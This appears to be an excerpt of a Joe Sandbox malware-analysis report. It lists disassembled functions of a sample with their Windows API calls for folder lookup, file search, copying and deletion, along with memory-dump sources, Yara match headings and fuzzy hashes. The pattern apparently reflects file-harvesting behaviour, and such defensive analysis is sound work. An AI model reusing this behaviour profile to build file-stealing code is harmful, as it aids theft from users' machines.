                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: `o@
                                            • API String ID: 0-590292170
                                            • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                            • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                            • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                            • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                            APIs
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                            • lstrcatA.KERNEL32(?,007CB738), ref: 00414C08
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0079D5B0,?,000003E8), ref: 00414A4A
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: UaA
                                            • API String ID: 2104210347-3893042857
                                            • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                            • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                            • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                            • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: SystemTimelstrcpy
                                            • String ID: cI@$cI@
                                            • API String ID: 62757014-1697673767
                                            • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                            • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                            • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                            • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                            APIs
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                            • lstrcatA.KERNEL32(?,007CC6B0), ref: 004150A8
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                            • String ID: aA
                                            • API String ID: 2699682494-2567749500
                                            • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                            • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                            • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                            • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 023EA094
                                            • lstrlen.KERNEL32(00000000), ref: 023EBF06
                                              • Part of subcall function 023F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023F90B9
                                            • StrStrA.SHLWAPI(00000000,004213E0), ref: 023EBF34
                                            • lstrlen.KERNEL32(00000000), ref: 023EC00C
                                            • lstrlen.KERNEL32(00000000), ref: 023EC020
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID:
                                            • API String ID: 1440504306-0
                                            • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                            • Instruction ID: 6582d426005f437444b9fb682400cd73e8cda7008f3d89a0045131f43a11737a
                                            • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                            • Instruction Fuzzy Hash: 31B11471910218ABCF64FBA0EDA5EEE733AAF54304F40456DE60AA6190EF345F48CF61
                                            APIs
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFileNextlstrcat
                                            • String ID: !=A
                                            • API String ID: 3840410801-2919091325
                                            • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                            • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                            • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                            • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                            APIs
                                              • Part of subcall function 023F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 023F9072
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F51E1
                                            • lstrcat.KERNEL32(?,00421070), ref: 023F51FE
                                            • lstrcat.KERNEL32(?,0064A5F8), ref: 023F5212
                                            • lstrcat.KERNEL32(?,00421074), ref: 023F5224
                                              • Part of subcall function 023F4B77: wsprintfA.USER32 ref: 023F4B93
                                              • Part of subcall function 023F4B77: FindFirstFileA.KERNEL32(?,?), ref: 023F4BAA
                                              • Part of subcall function 023F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 023F4BD8
                                              • Part of subcall function 023F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 023F4BEE
                                              • Part of subcall function 023F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 023F4DE4
                                              • Part of subcall function 023F4B77: FindClose.KERNEL32(000000FF), ref: 023F4DF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                            • Instruction ID: dd887d40776e4a2e99e1cebc7a58913702bcbf09e358fbdaede3d0742565f1e7
                                            • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                            • Instruction Fuzzy Hash: A6219B7AA402147BC764FBF0EC45EE9337EAB55700F404599B78992180DE749AC98F91
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID:
                                            • API String ID: 1206339513-0
                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction ID: 5df28d0c05a2aa70cb6d828a8d87790fd834895e33a7b904f4542bb4e87f337d
                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction Fuzzy Hash: 2001DA79640108FFCB04DFECD998EAE7BBAEF49394F108148F9099B301C635AA40DB95